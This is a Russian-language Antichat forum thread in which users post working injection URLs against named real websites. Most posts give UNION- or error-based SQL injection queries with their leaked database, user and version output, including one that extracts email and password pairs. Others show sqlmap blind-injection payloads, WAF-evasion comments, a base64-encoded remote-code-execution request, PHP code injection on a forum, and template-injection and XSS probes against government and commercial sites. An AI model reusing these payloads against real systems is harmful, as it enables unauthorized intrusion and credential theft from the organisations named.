HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #311  
Старый 03.03.2019, 12:38
BenderMR
Guest
Сообщений: n/a
Провел на форуме:
22457

Репутация: 10
По умолчанию

SQLi:

SoftwareOnRent

Код:
Code:
http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135


SOR|SORuser@localhost|5.5.56-MariaDB

Код:
Code:
http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135
SecurityDealOnline


Код:
Code:
http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+
bluewings|bluewings1@localhost|5.6.39-cll-lve

Код:
Code:
http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+
BrandTagz

Код:
Code:
http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts
[brandtag|brandtag@localhost|5.6.39-cll-lve]

Код:
Code:
http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts

 
Ответить с цитированием

  #312  
Старый 08.03.2019, 11:58
BenderMR
Guest
Сообщений: n/a
Провел на форуме:
22457

Репутация: 10
По умолчанию

Rcadia

Код:
Code:
http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19
rcadia2@rogueriver.dreamhost.com|rcadia2|5.6.34-log

Городской совет, Черкассы

Код:
Code:
http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+
myrada|myrada@ns1|5.5.24-log

Индусо шоп

Код:
Code:
https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+


myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1

Код:
Code:
https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#




 
Ответить с цитированием

  #313  
Старый 16.03.2019, 16:20
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

way.com

Код:
Code:
https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
Код:
Code:
http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
 
Ответить с цитированием

  #314  
Старый 28.07.2019, 20:58
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Код:
Code:
https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
 
Ответить с цитированием

  #315  
Старый 04.09.2019, 14:21
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию

rce (=

.SpoilerTarget" type="button">Spoiler: oops
шттп://www.t| u | torialspoint.com/



Stat on similarweb =)



PoC

.SpoilerTarget" type="button">Spoiler: query with params

Код:
Code:
from base64
UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
 
Ответить с цитированием

  #316  
Старый 08.11.2019, 15:12
Pop-Xlop
Guest
Сообщений: n/a
Провел на форуме:
7175

Репутация: 8
По умолчанию

ZoneAlarm

[CODE]
Code:
https://forums.zonealarm.com/ajax/render/widget_php
POST:
widgetConfig
Код:
=phpinfo();
 
Ответить с цитированием

  #317  
Старый 15.02.2020, 20:28
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Blind XSS в админке Hostinger, простите за ру сайт

https://crm.hostinger.io/client/29640132

PS: Зарепортил сказали спасибо и продлили хостинг на один месяц

 
Ответить с цитированием

  #318  
Старый 25.03.2020, 19:50
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю )

У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог (

https://secretdiscounter.com/ru/sear...&query={{7*7}}.

+ XSS

https://secretdiscounter.com/ru/"//>alert(5)
 
Ответить с цитированием

  #319  
Старый 27.03.2020, 18:31
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

General Inspectorate for Emergency Situations

Генеральная инспекция для чрезвычайных ситуаций

Код:
Code:
https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E
 
Ответить с цитированием

  #320  
Старый 27.03.2020, 18:44
sepo
Guest
Сообщений: n/a
Провел на форуме:
20604

Репутация: 18
По умолчанию

Promotora Española de Lingüística (Proel)

Код:
Code:
http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ